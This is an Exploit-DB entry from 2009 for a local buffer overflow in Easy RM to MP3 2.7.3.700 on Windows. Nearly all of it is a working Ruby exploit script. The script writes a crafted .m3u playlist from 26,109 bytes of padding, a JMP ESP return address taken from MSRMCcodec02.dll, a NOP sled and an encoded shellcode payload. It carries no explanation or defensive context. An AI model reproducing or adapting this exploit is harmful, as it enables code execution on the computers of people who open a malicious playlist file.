Easy RM to MP3 2.7.3.700 - Local Overflow

EDB-ID:

10642

CVE:

N/A

Author:

John Babio

Type:

local

Platform:

Windows

Published:

2009-12-24

#!/usr/bin/ruby

breakit = "\x41" * 26109
jump = "\x3a\xf2\xaa\x01"
padit = "\x90" * 25

#01AAF23A   FFE4 JMP ESP
#MSRMCcodec02.dll

finishhim =
"\xdd\xc5\xd9\x74\x24\xf4\x58\xbf\x27\x98\xb6\xfc\x31\xc9" +
"\xb1\x32\x31\x78\x17\x83\xe8\xfc\x03\x5f\x8b\x54\x09\x63" +
"\x43\x11\xf2\x9b\x94\x42\x7a\x7e\xa5\x50\x18\x0b\x94\x64" +
"\x6a\x59\x15\x0e\x3e\x49\xae\x62\x97\x7e\x07\xc8\xc1\xb1" +
"\x98\xfc\xcd\x1d\x5a\x9e\xb1\x5f\x8f\x40\x8b\x90\xc2\x81" +
"\xcc\xcc\x2d\xd3\x85\x9b\x9c\xc4\xa2\xd9\x1c\xe4\x64\x56" +
"\x1c\x9e\x01\xa8\xe9\x14\x0b\xf8\x42\x22\x43\xe0\xe9\x6c" +
"\x74\x11\x3d\x6f\x48\x58\x4a\x44\x3a\x5b\x9a\x94\xc3\x6a" +
"\xe2\x7b\xfa\x43\xef\x82\x3a\x63\x10\xf1\x30\x90\xad\x02" +
"\x83\xeb\x69\x86\x16\x4b\xf9\x30\xf3\x6a\x2e\xa6\x70\x60" +
"\x9b\xac\xdf\x64\x1a\x60\x54\x90\x97\x87\xbb\x11\xe3\xa3" +
"\x1f\x7a\xb7\xca\x06\x26\x16\xf2\x59\x8e\xc7\x56\x11\x3c" +
"\x13\xe0\x78\x2a\xe2\x60\x07\x13\xe4\x7a\x08\x33\x8d\x4b" +
"\x83\xdc\xca\x53\x46\x99\x2b\xa5\x5b\x37\xbb\x1c\x0e\x7a" +
"\xa1\x9e\xe4\xb8\xdc\x1c\x0d\x40\x1b\x3c\x64\x45\x67\xfa" +
"\x94\x37\xf8\x6f\x9b\xe4\xf9\xa5\xf8\x6b\x6a\x25\xff"

evil = breakit + jump + padit + finishhim
file=open("metalcore.m3u","w")
file.write(evil)
file.close()